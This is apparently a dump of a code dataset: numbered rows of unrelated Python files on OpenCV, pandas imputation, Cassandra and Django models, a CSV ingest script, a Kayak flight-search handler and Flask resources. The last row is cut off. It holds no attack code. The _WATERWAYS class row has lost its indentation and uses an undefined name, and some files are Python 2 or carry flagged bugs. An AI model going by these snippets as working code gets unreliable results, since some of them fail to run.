lines = cv2.HoughLinesP(edges, 1, np.pi/180.0, 150, minLineLength=50, maxLineGap=5) # threshold: higher -> fewer lines detected, lower -> more
# We draw colored segments, so convert the edge image back to BGR (Canny output is grayscale).
dst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)
if lines is not None:
    for i in range(lines.shape[0]): # N segments detected; N is not known in advance
        pt1 = (lines[i][0][0], lines[i][0][1]) # segment start point (middle index is always 0)
        pt2 = (lines[i][0][2], lines[i][0][3]) # segment end point (middle index is always 0)
        cv2.line(dst, pt1, pt2, (0,255,0), 2, cv2.LINE_AA)
cv2.imshow('src',src)
cv2.imshow('edges',edges)
cv2.imshow('dst',dst)
cv2.waitKey()
cv2.destroyAllWindows()
9,536 | 00429a16ac009f6f706ef11bc29b0aec77b9ebe6 | import pandas as pd
# Tutorial: strategies for handling NaN values in a pandas DataFrame and
# in a numpy array (via scikit-learn's SimpleImputer).
iris_nan = pd.read_csv("MLData/iris_nan.csv")
iris_nan.head()
Y = iris_nan["class"].values
X = iris_nan.drop("class", axis=1)
# Our iris dataframe presents some NaN values, and we need to fix that.
# We got some methods to apply on a pandas dataframe:
# 1: Drop records presenting a NaN value: We can achieve that with dropna,
# which will drop all the records presenting a NaN value inside.
# (The results below are intentionally discarded — each call is a demo.)
iris_nan.dropna()
# 2: A more intrusive method is to use dropna for each row/column that
# present a NaN value. We can drop an entire column presenting a NaN value
# by using dropna and specifying the axis: 0 for the row, 1 for the column.
# In this case, it will then drop the petal_length column.
iris_nan.dropna(axis=1)
# 3: A better method is to REPLACE NaN values with another one, usually the
# Mean, Median or the Mode. Let's see all of them:
# MEAN - We calculate the mean of the iris_nan dataframe and then use
# fillna, passing the mean, to fill each NaN with the average. mean() on the
# whole dataframe returns a Series with the mean of every numeric column;
# fillna then fills each NaN with the value matching its column label.
# Bug fix: numeric_only=True is required because the frame still contains
# the string column "class" — modern pandas raises a TypeError otherwise
# (older versions silently skipped non-numeric columns).
mean_replace = iris_nan.mean(numeric_only=True)
iris_nan.fillna(mean_replace)
# MEDIAN - The median is the "middle" value of a specific range of values.
# median() works exactly like mean(): it returns a series that fillna uses
# to replace the missing NaN values. numeric_only=True for the same reason.
median_replace = iris_nan.median(numeric_only=True)
iris_nan.fillna(median_replace)
# MODE - The mode is the element that appears the most in a set of elements.
# For example, given the array 3,7,9,13,18,18,24 the mode would be 18, since
# it is the element that appears the most. If every value is unique there is
# no mode. mode() returns a whole dataframe: the first row holds the mode
# (if present) and the rest are NaN, so we take just the first row with
# iloc[0] (positional indexing) and hand it to fillna.
mode_replace = iris_nan.mode().iloc[0]
iris_nan.fillna(mode_replace)
# For the numpy array we use another simple method: the Imputer, a tool to
# fill missing values inside a numpy array. From sklearn 0.22 onward we must
# import SimpleImputer, since Imputer has been deprecated.
from sklearn.impute import SimpleImputer
import numpy as np
# We create an imputer object, specifying two things:
# 1) strategy: mean, median or most_frequent — works exactly like the
#    previous examples.
# 2) missing_values: the marker to replace, specified by np.nan.
imputer = SimpleImputer(strategy="mean", missing_values=np.nan)
# fit_transform combines fit and transform: it first computes the per-column
# statistic (fit) and then replaces every np.nan in the argument (transform),
# returning a numpy array with all the NaNs filled.
X_imputed = imputer.fit_transform(X)
X_imputed
|
9,537 | c60b8eec57d845c73ee3e00432747d23748c1706 | import tensorflow as tf
def Float32():
    """Return TensorFlow's 32-bit floating-point dtype."""
    dtype = tf.float32
    return dtype
def Float16():
    """Return TensorFlow's 16-bit floating-point dtype."""
    dtype = tf.float16
    return dtype
9,538 | 8de6877f040a7234da73b55c8b7fdefe20bc0d6e | import pandas as pd
df = pd.read_csv('~/Documents/data/tables.csv')

# Render each table/reference pair as fenced blocks in a markdown file.
# The context manager guarantees the file is flushed and closed; the
# original opened it and never closed it, risking truncated output.
with open('tables_with_refs.md', 'w') as mdfile:
    mdfile.write('# Tables with references\n')
    for i, row in df.iterrows():
        # {% raw %} guards stop template engines (e.g. Jekyll/Liquid)
        # from interpreting the table contents.
        t = '\n```\n{% raw %}\n' + str(row['table']) + '\n{% endraw %}\n```\n'
        r = '\n```\n{% raw %}\n' + str(row['refs']) + '\n{% endraw %}\n```\n'
        mdfile.write('\nExample ' + str(i + 1))
        mdfile.write('\nTable:\n')
        mdfile.write(t)
        mdfile.write('References:\n')
        mdfile.write(r)
9,539 | 8559448822b3d3989a9795e7b497a2791588c327 | f = open("resources/yesterday.txt", 'r')
yesterday_lyric = ""
# Accumulate the whole lyric, one stripped line per row. Iterating the
# file object directly replaces the manual while/readline/break loop and
# behaves identically (readline-until-empty == line iteration).
for line in f:
    yesterday_lyric = yesterday_lyric + line.strip() + "\n"
f.close()
# Count the word "yesterday" case-insensitively: uppercase the whole text
# first, then count the uppercase form.
num_of_yesterday = yesterday_lyric.upper().count("YESTERDAY")
print("Number of a Word 'YESTERDAY'", num_of_yesterday)
# Now count 'Yesterday' and 'yesterday' case-sensitively.
num_of_small_yesterday = yesterday_lyric.count("yesterday")
num_of_title_yesterday = yesterday_lyric.count("Yesterday")
print("Number of a Word 'yesterday'", num_of_small_yesterday)
print("Number of a Word 'Yesterday'", num_of_title_yesterday)
|
9,540 | d7b91b0476a1f2e00408ce1f1501bf98d4c06e4e | # -*- coding: utf-8 -*-
# @Author: Marcela Campo
# @Date: 2016-05-06 18:56:47
# @Last Modified by: Marcela Campo
# @Last Modified time: 2016-05-06 19:03:21
import os

# Bug fix: the flask.ext.* import namespace was removed in Flask 1.0;
# the extensions must be imported under their own package names.
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand

from server import app, db

app.config.from_object('config.DevelopmentConfig')

# Wire up Flask-Migrate and expose its commands under `python manage.py db`.
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)

if __name__ == '__main__':
    manager.run()
|
9,541 | 33daf5753b27f6b4bcb7c98e28cf2168e7f0b403 |
#calss header
class _WATERWAYS():
def __init__(self,):
self.name = "WATERWAYS"
self.definitions = waterway
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['waterway']
|
9,542 | 73cacc1317c8624b45c017144bc7449bc99bd045 | import torch
from torchelie.data_learning import *
def test_pixel_image():
    """Smoke-test PixelImage: the default-initialised image is callable,
    and one built from an init image reproduces it (stored shifted by -0.5).
    """
    img = PixelImage((1, 3, 128, 128), 0.01)
    img()
    seed = torch.randn(3, 128, 128)
    img = PixelImage((1, 3, 128, 128), init_img=seed)
    assert seed.allclose(img() + 0.5, atol=1e-7)
def test_spectral_image():
    """Smoke-test SpectralImage: the default-initialised image is callable,
    and constructing from an init image must not raise (no value check).
    """
    img = SpectralImage((1, 3, 128, 128), 0.01)
    img()
    seed = torch.randn(1, 3, 128, 128)
    img = SpectralImage((1, 3, 128, 128), init_img=seed)
def test_correlate_colors():
    """CorrelateColors followed by its inverse is the identity (up to fp error)."""
    transform = CorrelateColors()
    img = torch.randn(1, 3, 64, 64)
    roundtrip = transform.invert(transform(img))
    assert img.allclose(roundtrip, atol=1e-5)
def test_parameterized_img():
    """Smoke-test ParameterizedImg over all space/colors combinations,
    with and without an init image, including a non-square size.
    torch.randn calls are kept in the original order so RNG consumption
    is identical.
    """
    seed = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
    ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
    ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr',
                     init_img=seed)()
    ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()

    # Non-square (odd width) case.
    seed_odd = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
    ParameterizedImg(1, 3, 128, 129, space='spectral', colors='uncorr',
                     init_img=seed_odd)()

    seed = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
    ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
    ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr',
                     init_img=seed)()
    ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
    ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr',
                     init_img=seed)()
    ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
    ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr',
                     init_img=seed)()
|
9,543 | 9cb734f67d5149b052ff1d412d446aea1654fa69 | import uuid
from cqlengine import columns
from cqlengine.models import Model
from datetime import datetime as dt
class MBase(Model):
    # Common base for every model in this module; abstract so cqlengine does
    # not create a table for it.
    __abstract__ = True
    #__keyspace__ = model_keyspace
class Post(MBase):
    """A user's post; `likes` is a Cassandra counter column."""
    id = columns.BigInt(index=True, primary_key=True)
    user_id = columns.Integer(required=True, index=True)
    text = columns.Text(required=True)
    # Bug fix: `columns.Counter` (the class object) was assigned instead of
    # an instance, so cqlengine never registered the column. Columns must be
    # instantiated like every other field above.
    likes = columns.Counter()
class Project(MBase):
    """A project with a denormalized follower counter."""
    id = columns.Integer(primary_key=True)
    # Bug fix: was `columns.Counter` (the un-instantiated class), which
    # cqlengine never registers as a column.
    follower_count = columns.Counter()
class Channel(MBase):
    # A named channel, addressable by its indexed slug.
    id = columns.Integer(primary_key=True)
    slug = columns.Text(required=True, index=True)
    name = columns.Text(required=True)
class User(MBase):
    """A user profile plus denormalized follow counters."""
    id = columns.Integer(primary_key=True)
    nick = columns.Text(required=True, index=True)
    # Bug fix: both Counter columns were assigned un-instantiated
    # (`columns.Counter`), so cqlengine never registered them.
    # NOTE(review): Cassandra requires counter columns to live in a table
    # whose non-key columns are all counters -- these may need to move to a
    # dedicated stats table; confirm against the schema.
    follower_count = columns.Counter()
    following_count = columns.Counter()
    extended = columns.Map(columns.Text, columns.Text)
class UserTimeLine(MBase):
    """
    POSTs that user will see in their timeline
    """
    user_id = columns.Integer(primary_key=True)
    post_id = columns.BigInt(primary_key=True)
class UserProject(MBase):
    """
    Projects that user follows
    """
    user_id = columns.Integer(primary_key=True)
    project_id = columns.Integer(primary_key=True)
class UserPost(MBase):
    """
    All the POSTs of a user
    """
    user_id = columns.Integer(primary_key=True)
    post_id = columns.BigInt(primary_key=True)
class UserFollower(MBase):
    """
    Followers of a user
    """
    user_id = columns.Integer(primary_key=True)
    follower_id = columns.Integer(primary_key=True)
class UserFollowing(MBase):
    """
    A user follows another user
    """
    user_id = columns.Integer(primary_key=True)
    following_id = columns.Integer(primary_key=True)
class ProjectFollower(MBase):
    # Users following a project.
    project_id = columns.Integer(primary_key=True)
    user_id = columns.Integer(primary_key=True)
class PostFollower(MBase):
    # Users following a post.
    # NOTE(review): post_id is TimeUUID here but BigInt in every other table
    # (Post.id, UserPost.post_id, ...) -- confirm which key type is intended.
    post_id = columns.TimeUUID(primary_key=True)
    user_id = columns.Integer(primary_key=True)
class ChannelFollower(MBase):
    # Users following a channel.
    channel_id = columns.Integer(primary_key=True)
    user_id = columns.Integer(primary_key=True)
class ChannelTimeLine(MBase):
    # Posts shown on a channel's timeline.
    channel_id = columns.Integer(primary_key=True)
    post_id = columns.BigInt(primary_key=True)
class ProjectTimeLine(MBase):
    # Posts shown on a project's timeline.
    project_id = columns.Integer(primary_key=True)
    post_id = columns.BigInt(primary_key=True)
class PostLike(MBase):
    # Users who liked a post.
    post_id = columns.BigInt(primary_key=True)
    user_id = columns.Integer(primary_key=True)
class PostComment(MBase):
    # Comments attached to a post.
    post_id = columns.BigInt(primary_key=True)
    comment_id = columns.BigInt(primary_key=True)
|
9,544 | 38c1b82a29a5ad0b4581e63fb083ca2487a79817 | #Created by Jake Hansen for Zebra interview take home assessment, July 2020.
import csv, os, sys, pickle
from datetime import date
#Class For storing information about each file generally. Helpful for future
#use cases to remember the indicies from a file, if file has thousands of fields
#Also can be used as a log to store daily number of 'good' vs 'bad' rows
class DataSource:
    """Per-file ingest summary: counts of usable/error rows plus the column
    indices discovered in that file (for logging and future runs)."""
    def __init__(self, name, usableRows, errorRows, indices):
        self.name = name
        self.usableRows = usableRows
        self.errorRows = errorRows
        # NOTE(review): the caller passes the module-level `indices` dict,
        # which is mutated for every input file -- all DataSource instances
        # end up aliasing the same dict (the last file's indices). Consider
        # passing a copy.
        self.indices = indices
# getHeaderIndexes(indices, headers)
# Requires: Pre-populated indices dictionary, the header's row from a CSV file with
# naming convention conforming to the schema output from the directions
# Effects: Determines if file has the necessary colums to match the desired output
# schema
# Modifies: The indices variable, returning the correct indices within the csv row
def getHeaderIndexes(indices, headers):
    """Locate the output-schema columns in a CSV header row.

    Mutates and returns `indices`, mapping each recognised column name to
    its position in `headers` (whitespace-stripped comparison; on duplicate
    headers the last occurrence wins, matching the original behaviour).
    The second return value is True only when all required columns appear.

    Replaces the original's seven single-letter boolean flags with a set of
    found names -- same behaviour, far less repetition.
    """
    required = ('Provider Name', 'CampaignID', 'Cost Per Ad Click',
                'Redirect Link', 'Phone Number', 'Address', 'Zipcode')
    found = set()
    for position, header in enumerate(headers):
        name = header.strip()
        if name in required:
            indices[name] = position
            found.add(name)
    valid = len(found) == len(required)
    return indices, valid
# isRowValid(indices,row)
# Requires: a valid CSV file with columns necessary to match the expected output
# Effects: Determines if a single row should be added to the final output, or if
# the row is missing data / has incorrect data types for the field and thus
# will not be added to the output but instead printed out
# Modifies: N/A
def isRowValid(indices, row):
    """Return True when `row` satisfies the output schema.

    Non-nullable string columns must be non-empty (after stripping
    whitespace) and not the literal 'NULL'; 'Cost Per Ad Click' must parse
    as a float after unquoting. 'Phone Number' is nullable, so it gets no
    value check (its presence is enforced by getHeaderIndexes).
    """
    # Non-nullable string columns.
    for column in ('Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode'):
        value = row[indices[column]].strip()
        if not value or value == 'NULL':
            return False
    # Non-nullable float columns.
    for column in ('Cost Per Ad Click',):
        value = row[indices[column]].strip('"').strip("'")
        try:
            float(value)
        # Bug fix: the bare `except:` also swallowed KeyboardInterrupt and
        # programming errors; float() on a str can only raise ValueError.
        except ValueError:
            return False
    return True
# addUsableRow(indices, row, finalOutput)
# Requires: The row is known to follow the output schema as specificed in the requirements
# Effects: Adds row variables in the order specified in the output schema
# Modifies: the final output variable
def addUsableRow(indices, row, finalOutput):
    """Append `row` (known to satisfy the output schema) to `finalOutput`
    as a quoted CSV line and return the grown string. An empty Phone Number
    field is written as the literal NULL."""
    def unquoted(column):
        return row[indices[column]].strip('"')

    phone = row[indices['Phone Number']]
    phone = 'NULL' if phone == '' else phone.strip('"')
    fields = [unquoted('Provider Name'), unquoted('CampaignID'),
              unquoted('Cost Per Ad Click'), unquoted('Redirect Link'),
              phone, unquoted('Address'), unquoted('Zipcode')]
    return finalOutput + '"' + '","'.join(fields) + '"' + '\n'
# addErrorRow(indices, row, errorFinalOutput)
# Requires: The row does not follow the output schema
# Effects: adds the row to the error output variable that will be printed out
# Modifies: the error final output string which gets printed at the end of the daily
# job / procedure / script/ whatever The Zebra prefers to call these python data projects
def addErrorRow(indices, row, errorFinalOutput):
    """Append a rejected `row` to the error report and return the grown
    string. `indices` is unused but kept for signature symmetry with
    addUsableRow."""
    record = 'Error: \n'
    if row:
        record += ','.join(row) + '\n'
    return errorFinalOutput + record
# Variables and data structures for the daily ingest run.
# NOTE(review): the header says 'RedirectLink' (no space) while the data
# columns and indices use 'Redirect Link' -- confirm which spelling the
# downstream consumer expects.
finalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\n'
errorFinalOutput = ''
# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
# pickelFileName = 'pickleTest/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
# Column-name -> position map; populated per input file by getHeaderIndexes.
indices = {
    "Provider Name": 0,
    "CampaignID": 0,
    "Cost Per Ad Click": 0,
    "Redirect Link": 0,
    "Phone Number": 0,
    "Address": 0,
    "Zipcode": 0
}
#InputFiles in list form
# inputList = [
#     'inputFilesTest/Auto.csv',
#     'inputFilesTest/Home.csv'
# ]
# InputFiles in a directory
inputDirectory = 'inputFiles'
# Pre-flight: reject the batch when the combined line count exceeds maxLines
# or when any file is not a .csv.
currentLines = 0
for file in os.listdir(inputDirectory):
# for file in inputList:
    # currentLines += sum(1 for line in open(file))
    # NOTE(review): the file handle opened here is never explicitly closed;
    # consider `with open(...)`.
    currentLines += sum(1 for line in open(inputDirectory + '/' + file))
    if currentLines > maxLines:
        sys.exit('Error: Too many lines')
    if file[-3:] != 'csv':
        sys.exit('Error: Given file not a .csv file')
# Main loop: for each input CSV, locate the schema columns, then route each
# row into the usable output or the error report.
for file in os.listdir(inputDirectory):
# for file in inputList:
    #usableRows and errorRows used for storing information from each data source
    usableRows = 0
    errorRows = 0
    # with open(file, newline='') as f:
    with open(inputDirectory + '/' + file, newline='') as f:
        reader = csv.reader(f)
        try:
            headers = next(reader)
        # NOTE(review): bare except here also hides non-StopIteration errors;
        # it exists to tolerate completely empty files.
        except:
            headers = ''
        indicesCurrent, valid = getHeaderIndexes(indices, headers)
        if valid == True:
            for row in reader:
                if isRowValid(indicesCurrent, row):
                    finalOutput = addUsableRow(indicesCurrent,row, finalOutput)
                    usableRows += 1
                else:
                    errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
                    errorRows += 1
            pickleDict[file] = indicesCurrent
        else:
            # Header is missing required columns: every row is an error row.
            for row in reader:
                errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
                errorRows += 1
    # Redundant: the `with` block above already closed the file.
    f.close()
    #Add dataSource Information for possible future needs and logging purposes
    # NOTE(review): this passes the shared, mutated `indices` dict to every
    # DataSource -- all entries alias the same object.
    newDataSource = DataSource(file,usableRows, errorRows, indices)
    dataSources.append(newDataSource)
#Create file with rows containing correct schema
with open(outputFileName, 'w+') as f:
    f.write(finalOutput)
# Redundant: `with` already closed the file (same for the two below).
f.close()
#print the incorrect rows
print(errorFinalOutput)
#Create Pickel file containing data source info for daily logging
with open(pickelFileName, 'wb') as f:
    pickle.dump(dataSources, f)
f.close()
#Create Pickle File dictionary with indices specific info for filenames
with open('pickle/masterDict', 'wb') as f:
    pickle.dump(pickleDict, f)
f.close()
#Thank you line
print("Thanks for taking the time to look at my code and consider me for this position. Cheers!")
|
9,545 | c8ab53c77ff3646a30ca49eaafc275afeadd2ca6 | from __future__ import division # floating point division
import csv
import random
import math
import numpy as np
import dataloader as dtl
import classalgorithms as algs
def getaccuracy(ytest, predictions):
    """Percentage of positions where the prediction matches the label."""
    matches = sum(1 for i in range(len(ytest)) if ytest[i] == predictions[i])
    return (matches / float(len(ytest))) * 100.0
def geterror(ytest, predictions):
    """Error percentage: the complement of the accuracy."""
    return 100.0 - getaccuracy(ytest, predictions)
# NOTE: Python 2 source (print statements) -- runs only under python2.
# Driver: trains each enabled classifier over every parameter set, reports
# per-run errors, then summarizes the best parameters per learner.
if __name__ == '__main__':
    trainsize = 1000
    testsize = 5000
    numruns = 1
    # Learners to evaluate; commented entries are available but disabled.
    classalgs = {'Random': algs.Classifier(),
                 #'Naive Bayes': algs.NaiveBayes({'notusecolumnones': True}),
                 #'Naive Bayes Ones': algs.NaiveBayes({'notusecolumnones': False}),
                 #'Linear Regression': algs.LinearRegressionClass(),
                 #'Logistic Regression': algs.LogitReg(),
                 #'L1 Logistic Regression': algs.LogitReg({'regularizer': 'l1'}),
                 #'L2 Logistic Regression': algs.LogitReg({'regularizer': 'l2'}),
                 'Logistic Alternative': algs.LogitRegAlternative(),
                 #'Neural Network': algs.NeuralNet({'epochs': 100,'alpha':.01})
                }
    numalgs = len(classalgs)
    parameters = (
        #Regularization Weight, neural network height?
        {'regwgt': 0.0, 'nh': 4},
        #{'regwgt': 0.01, 'nh': 8},
        #{'regwgt': 0.05, 'nh': 16},
        #{'regwgt': 0.1, 'nh': 32},
    )
    numparams = len(parameters)
    # errors[learner] is a (numparams, numruns) matrix of error percentages.
    errors = {}
    for learnername in classalgs:
        errors[learnername] = np.zeros((numparams,numruns))
    for r in range(numruns):
        print ""
        print "**********//////////////########### Run Number : ",(r+1),"###########\\\\\\\\\\\\\\\\\\\\\\\\\\\\*********"
        print ""
        ##
        ##Fetching Data; Put Condition Which DataSet To Run
        ##
        trainset, testset = dtl.load_susy(trainsize,testsize)
        #trainset, testset = dtl.load_susy_complete(trainsize,testsize)
        print('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r)
        for p in range(numparams):
            print ""
            print "********** Parameter : ",(p+1),"**********"
            print ""
            params = parameters[p]
            for learnername, learner in classalgs.iteritems():
                # Reset learner for new parameters
                learner.reset(params)
                print "\n"
                print 'Running learner = ' + learnername + ' on parameters ' + str(learner.getparams())
                print ""
                # Train model
                learner.learn(trainset[0], trainset[1])
                # Test model
                predictions = learner.predict(testset[0])
                error = geterror(testset[1], predictions)
                print 'Error for ' + learnername + ': ' + str(error)
                errors[learnername][p,r] = error
    print ""
    print "Some More Information : "
    print ""
    # Pick the parameter set with the lowest mean error per learner.
    for learnername, learner in classalgs.iteritems():
        besterror = np.mean(errors[learnername][0,:])
        bestparams = 0
        for p in range(numparams):
            aveerror = np.mean(errors[learnername][p,:])
            if aveerror < besterror:
                besterror = aveerror
                bestparams = p
        # Extract best parameters
        learner.reset(parameters[bestparams])
        print 'Best parameters for ' + learnername + ': ' + str(learner.getparams())
        print 'Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(1.96*np.std(errors[learnername][bestparams,:])/math.sqrt(numruns))
|
9,546 | 08568c31e5a404957c11eca9cbc9472c71cf088b | import os
import re
import logging
import time
from string import replace
from settings import *
import wsgiref.handlers
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from modules.xml2dict import *
from modules import kayak
from modules.messaging import *
from modules.cron import *
# Module-wide Kayak API client, configured from SETTINGS.
# NOTE(review): this rebinds the name `kayak` from the imported module to a
# client instance -- the module object is unreachable afterwards.
kayak = kayak.Kayak(
    SETTINGS['Kayak']['API_TOKEN'],
    SETTINGS['Kayak']['BASE_URL'],
)
class MainHandler(webapp.RequestHandler):
    # Root handler: currently a no-op. The original Twitter-mentions
    # rendering is kept below as an unused string literal (dead code).
    def get(self):
        pass
    '''
    messages = twitter.statuses.mentions()
    mydict = {'messages':{}}
    counter = 0
    for message in messages:
        mydict['messages'][('%s' % counter)] = message
        counter += 1
    path = os.path.join(os.path.dirname(__file__), 'templates/index.html')
    self.response.out.write(template.render(path, mydict))
    '''
class CronHandler(webapp.RequestHandler):
    """Kick off the scheduled jobs when /cron is hit."""
    def get(self):
        scheduler = Cron()
        scheduler.init_scheduler()
        scheduler.run()
class KayakApi(webapp.RequestHandler):
    """Runs a Kayak flight search driven by the collected messages and
    renders the result set with the kayak.html template."""
    def get(self):
        messaging = Messaging()
        messaging.collect_messages()
        messaging.process_messages()
        # Open a Kayak session and remember its id + cookie for later calls.
        kayak_session = kayak.get_session()
        logging.debug(kayak_session.content)
        session_id = re.search('<sid>(.*?)</sid>', kayak_session.content).group(1)
        kayak.session_id = session_id
        kayak.headers = { 'Cookie' : kayak_session.headers['set-cookie'] }
        kayak_search = kayak.post_search(
            messaging.mentions['from'],
            messaging.mentions['to'],
            messaging.mentions['departure']['day'] + '/' + messaging.mentions['departure']['month'] + '/' + messaging.mentions['departure']['year'],
            messaging.mentions['retour']['day'] + '/' + messaging.mentions['retour']['month'] + '/' + messaging.mentions['retour']['year']
        )
        logging.debug(kayak_search.content)
        search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.content).group(1)
        kayak.search_id = search_id
        kayak_results = kayak.get_results()
        logging.debug(kayak_results.content)
        # Bug fix: the old code called .group(0) on the result of re.search(),
        # which raises AttributeError whenever the pattern is absent
        # (re.search returns None on no match), and it also discarded the
        # results entirely when no more results were pending.
        result_set = kayak_results.content
        more_pending = re.search('<morepending>true</morepending>', kayak_results.content) is not None
        if more_pending:
            # Kayak is still collecting fares; poll once more after a delay.
            time.sleep(10)
            kayak_results = kayak.get_results()
            result_set = kayak_results.content
            logging.debug(kayak_results.content)
        content = replace(result_set, '&amp;', '&')
        xml = XML2Dict()
        trips = xml.fromstring(content)
        trip_dict = {'trips' : trips}
        path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
        self.response.out.write(template.render(path, trip_dict))
class KayakHandler(webapp.RequestHandler):
    # Renders a previously saved result file (kayak-result.xml); useful for
    # developing the template without hitting the Kayak API.
    def get(self):
        # NOTE(review): the handle is never closed; consider `with open(...)`.
        file = open('kayak-result.xml','r')
        content = file.read()
        content = replace(content, '&amp;', '&')
        xml = XML2Dict()
        trips = xml.fromstring(content)
        trip_dict = {'trips' : trips}
        '''
        xml = ET.fromstring(content)
        trips = xml.findall("trips/trip")
        trip_dict = {'trips' : trips}
        '''
        path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
        self.response.out.write(template.render(path, trip_dict))
class ClearTripHandler(webapp.RequestHandler):
    # Renders a previously saved ClearTrip result file (result.xml) with the
    # cleartrip.html template; same offline-development purpose as
    # KayakHandler.
    def get(self):
        # NOTE(review): the handle is never closed; consider `with open(...)`.
        file = open('result.xml','r')
        content = file.read()
        content = replace(content, '&amp;', '&')
        xml = XML2Dict()
        trips = xml.fromstring(content)
        trip_dict = {'trips' : trips}
        '''
        xml = ET.fromstring(content)
        trips = xml.findall("trips/trip")
        trip_dict = {'trips' : trips}
        '''
        path = os.path.join(os.path.dirname(__file__), 'templates/cleartrip.html')
        self.response.out.write(template.render(path, trip_dict))
class MessageParser(webapp.RequestHandler):
    """Debug endpoint: collect and process messages, then dump the parsed
    mentions straight into the response."""
    def get(self):
        msg = Messaging()
        msg.collect_messages()
        msg.process_messages()
        self.response.out.write(msg.mentions)
def main():
    # Wire URL routes to handlers and serve via CGI (classic GAE webapp).
    logging.getLogger().setLevel(logging.DEBUG)
    application = webapp.WSGIApplication([
        ('/', MainHandler),
        ('/kayak', KayakHandler),
        ('/cleartrip', ClearTripHandler),
        ('/cron', CronHandler),
        ('/api/kayak', KayakApi),
        ('/messaging', MessageParser),
    ], debug=True)
    wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
    main()
|
9,547 | 87e0b9dc518d439f71e261d5c5047153324919ba | # Generated by Django 2.0.2 on 2018-06-10 18:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration for the `plots` app: creates the
    Expression / Gene / MutualInformation / Pca / Sample tables and then
    wires up their foreign keys."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Expression',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.FloatField()),
            ],
        ),
        migrations.CreateModel(
            name='Gene',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gene_id', models.CharField(max_length=20, unique=True)),
                ('summary', models.CharField(max_length=10000)),
            ],
        ),
        migrations.CreateModel(
            name='MutualInformation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.FloatField()),
                ('dataset', models.CharField(max_length=1000)),
                ('gene1', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gene1', to='plots.Gene')),
                ('gene2', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gene2', to='plots.Gene')),
            ],
        ),
        migrations.CreateModel(
            name='Pca',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pc1', models.FloatField()),
                ('pc2', models.FloatField()),
            ],
        ),
        migrations.CreateModel(
            name='Sample',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=1000)),
                ('cell_type', models.CharField(max_length=100)),
                ('dataset', models.CharField(max_length=1000)),
            ],
        ),
        # Foreign keys added after model creation (generated ordering).
        migrations.AddField(
            model_name='pca',
            name='sample',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plots.Sample'),
        ),
        migrations.AddField(
            model_name='expression',
            name='gene',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plots.Gene'),
        ),
        migrations.AddField(
            model_name='expression',
            name='sample',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plots.Sample'),
        ),
    ]
|
9,548 | 4dcc0261abdb783c60471736567faf7db8b56190 | from model.area import AreaModel
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
class Area(Resource):
    """CRUD endpoints for a single Area, addressed by name (JWT protected)."""
    # NOTE(review): this parser (misspelled `pareser`) is defined but never
    # used by any handler below; kept untouched for backward compatibility.
    pareser = reqparse.RequestParser()
    pareser.add_argument('name',
                         type=str,
                         required=True,
                         help='Area name is required')

    @jwt_required()
    def get(self, name):
        """Return the area as JSON, or 404 when it does not exist."""
        area = AreaModel.search_area_byname(name)
        if area:
            return area.json(), 200
        return {'message': 'Area not found'}, 404

    @jwt_required()
    def put(self, name):
        """Create the area if absent; error when it already exists."""
        area = AreaModel.search_area_byname(name)
        if area:
            # Typo fix: message was 'Aread already exists'.
            # NOTE(review): 404 is an odd status for "already exists";
            # 400 or 409 would be conventional -- confirm with API clients
            # before changing the code.
            return {'message': 'Area already exists'}, 404
        area = AreaModel(name)
        area.save_to_db()
        return area.json()

    @jwt_required()
    def delete(self, name):
        """Delete the area; 404 on an unknown name."""
        area = AreaModel.search_area_byname(name)
        if area:
            area.delete()
            # NOTE(review): 204 responses are sent without a body, so this
            # message is dropped by most servers -- confirm intent.
